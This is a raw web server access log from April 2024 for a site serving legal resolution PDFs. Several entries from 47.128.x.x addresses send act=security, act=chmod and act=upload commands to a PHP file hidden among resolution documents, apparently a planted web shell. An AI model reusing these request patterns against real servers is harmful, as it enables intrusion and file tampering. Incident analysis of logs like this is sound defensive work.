47.128.120.91 - - [04/Apr/2024:02:34:17 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=security&d=E%3A%5Cnuevo%5Chtdocs%5CCaja+Herramientas+PIGA%5C HTTP/1.1" 200 2777
201.245.192.253 - - [04/Apr/2024:02:34:38 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d66189f0c22d6a4c589cd0fb03154225f8.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
47.128.121.0 - - [04/Apr/2024:02:34:41 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&d=E%3A%5Cnuevo%5Chtdocs%5Cxampp&f=iart.php HTTP/1.1" 200 2857
172.22.2.4 - - [04/Apr/2024:02:34:51 -0500] "GET /BLA/boletinlegal/Circulares/2013/Circular%20No.%204%20del%2005%20de%20junio%20de%202013.pdf HTTP/1.1" 200 130461
201.245.192.253 - - [04/Apr/2024:02:34:53 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d662c41b008f2848f8812f805002413222.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
47.128.24.110 - - [04/Apr/2024:02:35:06 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&d=E%3A%5Cnuevo%5Ccontrib%5C HTTP/1.1" 200 2827
40.77.167.132 - - [04/Apr/2024:02:35:07 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1674.pdf HTTP/1.1" 200 283372
216.245.221.92 - - [04/Apr/2024:02:35:19 -0500] "HEAD / HTTP/1.1" 200 -
47.128.34.143 - - [04/Apr/2024:02:35:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&d=E%3A%5Cnuevo%5CMercuryMail&f=MERCURY HTTP/1.1" 200 2844
146.19.24.28 - - [04/Apr/2024:02:35:37 -0500] "GET / HTTP/1.1" 200 319
47.128.44.192 - - [04/Apr/2024:02:35:53 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=upload&d=E%3A%5Cnuevo%5Ctomcat HTTP/1.1" 200 2808
172.22.2.4 - - [04/Apr/2024:02:34:31 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
98.64.96.28 - - [04/Apr/2024:02:36:12 -0500] "GET /Publicaciones/2024EE54527.pdf HTTP/1.1" 404 227
201.245.192.253 - - [04/Apr/2024:02:36:38 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d66189f0c22d6a4c589cd0fb03154225f8.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [04/Apr/2024:02:36:53 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d662c41b008f2848f8812f805002413222.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [04/Apr/2024:02:35:22 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58273
201.245.192.253 - - [04/Apr/2024:02:37:48 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
201.245.192.253 - - [04/Apr/2024:02:38:38 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d66189f0c22d6a4c589cd0fb03154225f8.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
